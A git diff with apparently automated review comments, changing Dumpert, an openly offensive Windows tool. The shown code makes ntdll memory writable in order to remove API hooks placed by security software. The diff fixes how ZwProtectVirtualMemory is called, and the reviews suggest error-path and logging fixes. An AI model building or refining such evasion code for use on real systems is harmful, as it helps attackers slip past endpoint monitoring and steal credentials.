diff --git a/Dumpert-Aggressor/Outflank-Dumpert.bin b/Dumpert-Aggressor/Outflank-Dumpert.bin
index 6101aa6..ffc1be3 100644
Binary files a/Dumpert-Aggressor/Outflank-Dumpert.bin and b/Dumpert-Aggressor/Outflank-Dumpert.bin differ
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
index 28ee4e6..8412e28 100755
--- a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
@@ -40,9 +40,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
 LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
+ LPVOID lpBaseAddress = lpProcAddress;
 ULONG OldProtection, NewProtection;
 SIZE_T uSize = 10;
- NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+ NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
 if (status != STATUS_SUCCESS) {
 return FALSE;
 }
@@ -52,7 +53,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
 return FALSE;
 }
- status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
+ status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
 if (status != STATUS_SUCCESS) {
 return FALSE;
 }
diff --git a/Dumpert/Outflank-Dumpert/Dumpert.c b/Dumpert/Outflank-Dumpert/Dumpert.c
index 4539513..599dd78 100755
--- a/Dumpert/Outflank-Dumpert/Dumpert.c
+++ b/Dumpert/Outflank-Dumpert/Dumpert.c
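Review bot: The new `lpBaseAddress` copy in the @@ -40,9 +40,10 @@ hunk of Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c has no comment saying why it exists, and the call site does not make the reason obvious: `ZwProtectVirtualMemory` receives the base address and region size by pointer and, as far as the NT API is documented, writes the page-aligned values back through them. I would add `/* ZwProtectVirtualMemory rounds *BaseAddress and *RegionSize to page boundaries in place; pass a copy so lpProcAddress is left unchanged. */` above the declaration, here and in the matching @@ -44,9 +44,10 @@ hunk of Dumpert/Outflank-Dumpert/Dumpert.c. `uSize` is passed the same way, so after the first call it presumably no longer holds 10, and any code between the two hunks that reads it should be checked. The body of `Unhook_NativeAPI` starts and ends outside the hunk.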
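Review bot: The `return FALSE; }` at the top of the @@ -52,7 +53,7 @@ hunk sits between the two protection calls, so on that path the function returns before the `OldProtection` restore runs and the page appears to stay `PAGE_EXECUTE_READWRITE`. The condition guarding that return is outside the hunk, so this is inferred from the visible ordering only. A code page left both writable and executable breaks W^X for the rest of the process lifetime; once the first call has succeeded, every exit should restore the protection, for example by issuing `ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);` before that `return FALSE;`. The same ordering is visible in the @@ -58,7 +59,7 @@ hunk of Dumpert/Outflank-Dumpert/Dumpert.c.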
@@ -44,9 +44,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
 printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]);
 printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall);
+ LPVOID lpBaseAddress = lpProcAddress;
 ULONG OldProtection, NewProtection;
 SIZE_T uSize = 10;
- NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+ NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
 if (status != STATUS_SUCCESS) {
 wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
 return FALSE;
@@ -58,7 +59,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
 return FALSE;
 }
- status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
+ status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
 if (status != STATUS_SUCCESS) {
 wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
 return FALSE;
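Review bot: Both failure branches in Dumpert/Outflank-Dumpert/Dumpert.c print the identical text `ZwProtectVirtualMemory failed.` and drop `status`, so the output cannot tell the protection change from the restore, nor show why the call was refused. I would make the second one `wprintf(L" [!] ZwProtectVirtualMemory (restore) failed: 0x%08lx\n", (unsigned long)status);` and add the status value to the first in the same way. The first hunk also mixes `printf` and `wprintf` on the same stream; sticking to one family keeps the output orientation consistent. The function continues outside both hunks.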